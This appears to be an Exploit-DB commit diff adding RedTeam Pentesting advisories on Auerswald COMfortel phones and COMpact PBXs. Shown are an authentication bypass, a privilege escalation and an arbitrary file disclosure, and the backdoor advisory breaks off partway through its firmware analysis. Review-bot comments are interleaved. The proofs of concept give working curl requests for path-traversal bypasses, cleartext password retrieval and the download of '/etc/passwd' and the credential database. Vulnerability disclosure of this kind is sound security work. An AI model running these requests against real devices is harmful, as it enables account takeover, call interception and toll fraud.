DB: 2021-12-07
8 changes to exploits/shellcodes

HCL Lotus Notes V12 - Unquoted Service Path
Auerswald COMfortel 2.8F - Authentication Bypass
Auerswald COMpact 8.0B - Privilege Escalation
Auerswald COMpact 8.0B - Arbitrary File Disclosure
Auerswald COMpact 8.0B - Multiple Backdoors
Advanced Comment System 1.0 - Remote Command Execution (RCE)
Croogo 3.0.2 - Remote Code Execution (Authenticated)
This commit is contained in:
parent
34c9d56d78
commit
0990eb4d38
8 changed files with 1376 additions and 66 deletions
317
exploits/hardware/remote/50565.txt
Normal file
@ -0,0 +1,317 @@
# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH
# Version: 1400/2600/3600

Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass


RedTeam Pentesting discovered a vulnerability in the web-based
configuration management interface of the Auerswald COMfortel 1400 and
2600 IP desktop phones. The vulnerability allows accessing configuration
data and settings in the web-based management interface without
authentication.


Details
=======

Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
Affected Versions: <= 2.8F
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.auerswald.de
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
Advisory Status: published
CVE: CVE-2021-40856
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856


Introduction
============

"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and
IP system phone), with 4.3" colour touch display and preconfigured
answering machine"

(from the vendor's homepage)


More Details
============

During a penetration test it was discovened that several VoIP phones
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow
accessing administrative functions without login credentials, bypassing
the authentication. This can be achieved by simply prefixing API
endpoints that require authentication with "/about/../", since the
"/about" endpoint does not require any authentication.


Proof of Concept
================

The phones run a web-based management interface on Port 80. If accessed,
the HTTP response code 401 together with a website redirecting to the
path "/statics/pageChallenge.html" is returned. This can for example be
seen using the command-line HTTP client curl[1] as follows:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

The website contains JavaScript code that requests the path
"/about?action=get" and loads a JSON document (formatted and shortened
to increase readability):

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/about?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3673
Date: Mon, 30 Aug 2021 08:39:24 GMT
Server: lighttpd

{
"DATA": {
"firmware": {
"TYPE": "DATAITEM",
"VALUE": "2.8E",
"KEY": "firmware"
},
"serial": {
"TYPE": "DATAITEM",
"VALUE": "1234567890",
"KEY": "serial"
},
[...]
}
}

------------------------------------------------------------------------

Among other information, this JSON document contains the serial number
and firmware version displayed on the website. This action can be
accessed without authentication. Other endpoints require authentication,
for example the path "/tree?action=get", from which the menu structure
is loaded after successful authentication:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/tree?action=get'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

During the penetration test, it was discovered that this action can
successfully be requested by inserting the prefix "/about/../". In order
to prevent curl from normalizing the URL path, the option "--path-as-is"
must be supplied:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../tree?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3808
Date: Mon, 30 Aug 2021 08:42:11 GMT
Server: lighttpd

{
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 2,
"TYPE": "ITEMLIST",
"1": {
"id": 31,
"text": "applications_settings",
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 1,
"TYPE": "ITEMLIST",
"0": {
"target": "pageFunctionkeys.html",
"id": 32,
"action": "/functionkeys",
"text": "key_app",
"pagename": "Functionkeys",
"TYPE": "TREENODEPAGE"
}
}
},
[...]
}
}
------------------------------------------------------------------------

The endpoint "/account" allows listing account data:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=list'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd

{
"DATA": {
[...]
"accountList0": {
"KEY": "accountList0",
"COUNT": 1,
"TYPE": "DATAMODEL",
"VALUE": {
"0": {
"ID": 32327,
"PARENTID": 0,
"PROVIDER": "ProviderName",
"NAME": "123 Example User",
"STATUS": 4,
"DEFAULT": 1
}
},
[...]
},
}
}
------------------------------------------------------------------------

The ID 32327 can then be used to get details about that particular
account, including the username and password:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=get&itemID=32327'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd

{
"DATA": {
[...]
"Benutzer": {
"TYPE": "DATAITEM",
"VALUE": "123",
"KEY": "Benutzer"
},
"Passwort": {
"TYPE": "DATAITEM",
"VALUE": "secret",
"KEY": "Passwort"
},
[...]
}
}
------------------------------------------------------------------------

Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
access and use the web-based management interface as if regular login
credentials were presented.

It is likely that other functionality can be accessed in the same way,
to for example change settings or activate the integrated option for
recording the Ethernet traffic.


Workaround
==========

Disable the web-based management interface if possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Inserting the prefix "/about/../" allows bypassing the authentication
check for the web-based configuration management interface. This enables
attackers to gain access to the login credentials used for
authentication at the PBX, among other data.

Attackers can then authenticate at the PBX as the respective phone and
for example call premium rate phone lines they operate to generate
revenue. They can also configure a device they control as the PBX in the
phone, so all incoming and outgoing phone calls are intercepted and can
be recorded. The device also contains a function to record all Ethernet
data traffic, which is likely affected as well.

Overall, the vulnerability completely bypasses the authentication for
the web-based management interface and therefore poses a high risk.


References
==========

[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
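Review bot: the `# Version:` header of 50565.txt lists the phone models (`1400/2600/3600`) rather than the affected firmware version, while the Details section states `Affected Versions: <= 2.8F`; the header should read `# Version: <= 2.8F`, since the models are already named in the title and the Product line. Two smaller points in the same file: "it was discovened" in the More Details section should be "it was discovered", and `# Date: 06/12/2021` is ambiguous (day/month order) next to the file's own ISO-formatted timeline entry `2021-12-06 Advisory published`, so the header date is better written as 2021-12-06.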
301
exploits/hardware/remote/50567.txt
Normal file
@ -0,0 +1,301 @@
# Exploit Title: Auerswald COMpact 8.0B - Privilege Escalation
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Auerswald COMpact Privilege Escalation


RedTeam Pentesting discovered a vulnerability in the web-based
management interface of the Auerswald COMpact 5500R PBX which allows
low-privileged users to access passwords of administrative user accounts.


Details
=======

Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Fixed Versions: 8.2B
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
Advisory Status: published
CVE: CVE-2021-40857
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintanance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

Attackers with low-privileged user accounts, for example those that are
used by VoIP phones, can log into the web-based management interface of
the COMpact 5500R PBX. Afterwards, the list of user accounts can be
listed and details shown for each user account. Adding the URL parameter
"passwd=1" then also includes the clear text password for each user
account, including administrative ones, which can then be used to
authenticate against the management interface.


Proof of Concept
================

The command-line HTTP client curl[1] can be used as follows to log in
with the username "123" and the password "secret" (shortened and
formatted to increase readability):

------------------------------------------------------------------------
$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
[...]

[
{
"login": 1,
"userId": 1234,
"userRufNr": "123",
"userName": "123",
"pbxType": 35,
"pbxId": 0,
"pbx": "COMpact 5500R",
"pbxEdit": "Comp.5500R",
"isActivated": 1,
"dongleTnCount": 112,
"currentConfig": 34,
"cur": "EUR",
"language": 0,
"hidePrivat": 1,
"offlineConfig": false
},
[...]
]
------------------------------------------------------------------------

The server returns a JSON document describing the user account as well
as a session ID in a cookie. This session ID can then be used to access
other API endpoints on the PBX. The following listing shows the request to
the path "/logstatus_state", which returns the current access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Teilnehmer"}
------------------------------------------------------------------------

The access level in this case is "Teilnehmer" (member).

The list of all other users can be requested as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
https://192.168.1.2/cfg_data_teilnehmer

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

[
[...]
{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
[...]
{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
[...]
]
------------------------------------------------------------------------

Two user accounts are shown in the listing above: the current user's
account with the ID 1234 and a different user account with so-called
"sub-admin" privileges with the ID 2222.

Details about a particular user account with a given ID can be requested
like this:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",
[...], "isSubadmin":0,[...]}
------------------------------------------------------------------------

In the returned JSON document, the values of the fields for the PIN,
token and password are replaced by "XXX". But if the URL parameter
"passwd" is set to the value 1, the values are returned in plain text:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"12345678","privatPass":"secretpassword",
"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}
------------------------------------------------------------------------

This can be repeated for other user accounts, for example for the
user account with the ID 2222 shown it the listing earlier. The server
returns the plain text password for the other user account:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",
[...],"isSubadmin":1,[...]}
------------------------------------------------------------------------

The password can then be used to log into the PBX with the other user
account:

------------------------------------------------------------------------
$ curl --anyauth --user sub-admin:verysecretpassword --include \
https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]
------------------------------------------------------------------------

Checking the access level with the new session ID shows that the user is
now logged in with an administrative account:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}%
------------------------------------------------------------------------


Workaround
==========

Disable or restrict access to the web-based management interface if
possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Attackers who have acquired access to a low-privileged user account, for
example by extracting such an account from a VoIP phone, can log into
the web-based management interface of the COMpact 5500R PBX and access
clear text passwords for other user accounts, including those with the
"sub-admin" privilege. After logging in with these newly acquired
credentials, attackers can access configuration settings and most other
functions.

They can then for example create new SIP credentials and use them to
call premium rate phone lines they operate to generate revenue. They can
monitor and even redirect all incoming and outgoing phone calls and
record all Ethernet data traffic.

Due to the severe and far-reaching consequences and despite the
prerequisite of having to know an existing low-privilege user account,
this vulnerability rated as a high risk.


Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published


References
==========

[1] https://curl.se/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
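Review bot: in 50567.txt, the curl command that requests the sub-admin account's details (`'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1`) is missing its closing single quote, so the listing cannot be pasted and run as written; add the trailing `'`. In the final listing, the `%` after `{"logstatus":"Sub-Administrator"}` is the shell's missing-newline marker, not part of the HTTP response, and should be dropped. Documentation points: the header block has no `# Version:` line although the Details section states `Affected Versions: <= 8.0B`; the `Product:` line also names COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19") and COMmander Basic.2(19"), which the Affected Versions and Fixed Versions lines do not cover, so their status should be stated explicitly. Minor wording: "shown it the listing earlier" should be "shown in the listing earlier", and "this vulnerability rated as a high risk" is missing "is".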
302
exploits/hardware/remote/50568.txt
Normal file
@ -0,0 +1,302 @@
# Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Auerswald COMpact Arbitrary File Disclosure


RedTeam Pentesting discovered a vulnerability in the web-based
management interface of the Auerswald COMpact 5500R PBX which allows
users with the "sub-admin" privilege to access any files on the PBX's
file system.


Details
=======

Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Fixed Versions: 8.2B
Vulnerability Type: Arbitrary File Disclosure
Security Risk: medium
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
Advisory Status: published
CVE: CVE-2021-40858
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintanance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

RedTeam Pentesting discovered that attackers with administrative access
to the PBX's web-based management interface (as a so-called "sub-admin")
can download arbitrary files from the PBX's file system. This includes
the usually not accessible configuration database which contains the
password for the highly privileged "Admin" user in clear text.


Proof of Concept
================

The command-line HTTP client curl[1] can be used to log into the
management interface of the PBX with the username "sub-admin" and the
password "verysecretpassword" as follows:

------------------------------------------------------------------------
$ curl --anyauth --user sub-admin:verysecretpassword --include \
https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]
------------------------------------------------------------------------

The server returns a session ID in a cookie which is then used to check
the access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}
------------------------------------------------------------------------

In the PBX's user management, the access level "Sub-Administrator" is
used for user accounts who should be able to configure the PBX. There
are also other, higher-level access privileges.

Users with the "sub-admin" privilege can configure music on hold (MOH,
"Wartemusik"), and for example listen to the currently configured music.
In order to do this, the browser requests the music files from the PBX.

The file "alarm1.wav" can be accessed with curl as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
'&pageindex=1'

HTTP/1.1 200 OK
Content-Type: audio/x-wav; charset=
Content-Length: 132192
Content-disposition: attachment; filename="alarm1.wav"
[...]
------------------------------------------------------------------------

It was found that the PBX allows directory traversal with the string
"../", so the file "/etc/passwd" can be accessed as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/wartemusik_verwaltung_play?'\
'fileName=../../etc/passwd&pageindex='

HTTP/1.1 200 OK
[...]
Content-Length: 113
Content-disposition: attachment; filename="../../etc/passwd"
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

The same issue is present in the function for managing logos. A regular
request for the file "logo1.jpg" is shown below:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'

HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: image/jpg; charset=UTF-8
Content-Length: 13986
Content-disposition: attachment; filename="logo1.jpg"
[...]
------------------------------------------------------------------------

In a similar fashion as before, the file "/etc/passwd" can be accessed:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'

HTTP/1.1 200 OK
[...]

root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

For attackers, an interesting file is the SQLite[2] database file
"/data/db/pbx4.db". It can be downloaded as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
|
||||||
|
'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
|
||||||
|
> pbx4.db
|
||||||
|
|
||||||
|
% Total % Received % Xferd Average Speed Time Time Time Current
|
||||||
|
Dload Upload Total Spent Left Speed
|
||||||
|
100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
This file contains the password for the highly privileged "Admin" user
|
||||||
|
account:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ sqlite3 pbx4.db
|
||||||
|
SQLite version 3.27.2 2019-02-25 16:06:06
|
||||||
|
Enter ".help" for usage hints.
|
||||||
|
|
||||||
|
sqlite> .tables
|
||||||
|
DbFileVersion PbxMisc
|
||||||
|
|
||||||
|
sqlite> select * from PbxMisc;
|
||||||
|
[...]
|
||||||
|
AdminPasswdHash|
|
||||||
|
AdminLogin|Admin
|
||||||
|
AdminPin|43214321
|
||||||
|
AdminPasswd|S3kr1t!
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The username and password can then be used to log into the web
|
||||||
|
application:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --user 'Admin:S3kr1t!' --anyauth --include \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[{"login":3,"userId":0,"userName":"",[...]}]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Checking the access level reveals the new privilege:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Administrator"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The user "Admin", in contrast to regular administrative users
|
||||||
|
("sub-admin"), can access more functions and for example apply firmware
|
||||||
|
updates.
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Disable or restrict access to the web-based management if possible.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade to a firmware version which corrects this vulnerability.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
Attackers who already have acquired administrative access as a so-called
|
||||||
|
"sub-admin" can download a database file and access the password for the
|
||||||
|
highly privileged "Admin" account. This account can use more functions and
|
||||||
|
is allowed to apply firmware updates.
|
||||||
|
|
||||||
|
On the one hand, exploiting this vulnerability already requires
|
||||||
|
administrative access. On the other hand, attackers can reach
|
||||||
|
high-privileged access to the PBX and use functions not available to
|
||||||
|
"sub-admin" users, like firmware updates. All in all, this vulnerability
|
||||||
|
is therefore rated to have a medium risk potential.
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2021-08-26 Vulnerability identified
|
||||||
|
2021-09-01 Customer approved disclosure to vendor
|
||||||
|
2021-09-10 Vendor notified
|
||||||
|
2021-09-10 CVE ID requested
|
||||||
|
2021-09-10 CVE ID assigned
|
||||||
|
2021-10-05 Vendor provides access to device with fixed firmware
|
||||||
|
2021-10-11 Vendor provides fixed firmware
|
||||||
|
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
|
||||||
|
2021-12-06 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
References
|
||||||
|
==========
|
||||||
|
|
||||||
|
[1] https://curl.se
|
||||||
|
[2] https://www.sqlite.org
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at:
|
||||||
|
https://www.redteam-pentesting.de/
|
||||||
|
|
||||||
|
|
||||||
|
Working at RedTeam Pentesting
|
||||||
|
=============================
|
||||||
|
|
||||||
|
RedTeam Pentesting is looking for penetration testers to join our team
|
||||||
|
in Aachen, Germany. If you are interested please visit:
|
||||||
|
https://www.redteam-pentesting.de/jobs/
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
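Review bot: the Workaround and Fix sections ("Disable or restrict access to the web-based management if possible." / "Upgrade to a firmware version which corrects this vulnerability.") leave out the credential consequence the proof of concept itself shows: pbx4.db stores the "Admin" password in clear text (AdminPasswd|S3kr1t! next to an empty AdminPasswdHash, plus AdminPin|43214321), so a sub-admin who has already downloaded the database keeps a working Admin login after the traversal is patched. Suggest adding a line to Fix such as "After upgrading, change the Admin password and PIN", and stating in Security Risk that the database holds the password unhashed, since that is a separate weakness from the directory traversal and decides how operators must treat past exposure.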

350
exploits/hardware/remote/50569.txt
Normal file
@ -0,0 +1,350 @@
# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Auerswald COMpact Multiple Backdoors


RedTeam Pentesting discovered several backdoors in the firmware for the
Auerswald COMpact 5500R PBX. These backdoors allow attackers who are
able to access the web-based management application full administrative
access to the device.


Details
=======

Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)
Fixed Versions: 8.2B, 4.0T
Vulnerability Type: Backdoor
Security Risk: high
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
Advisory Status: published
CVE: CVE-2021-40859
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintanance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

Two backdoor passwords were found in the firmware of the COMpact 5500R
PBX. One backdoor password is for the secret user "Schandelah", the
other can be used for the highest-privileged user "Admin". No way was
discovered to disable these backdoors.


Proof of Concept
================

The firmware for the COMpact 5500R can be downloaded from the vendor's
homepage[1]. The following details refer to firmware version 7.8A, but
the latest firmware at the time of writing (8.0B) is affected as well.

Inspecting the downloaded file reveals that it is compressed and can be
extracted with the program "gunzip":

------------------------------------------------------------------------
$ file 7_8A_002_COMpact5500.rom
7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
15:04:43 2020, from Unix, original size 196976698

$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz

$ gunzip 7_8A_002_COMpact5500.gz
------------------------------------------------------------------------

Analysing the resulting file again shows that it is an image file in the
format required by the bootloader "Das U-Boot"[2], a popular bootloader
for embedded devices:

------------------------------------------------------------------------
$ file 7_8A_002_COMpact5500.rom

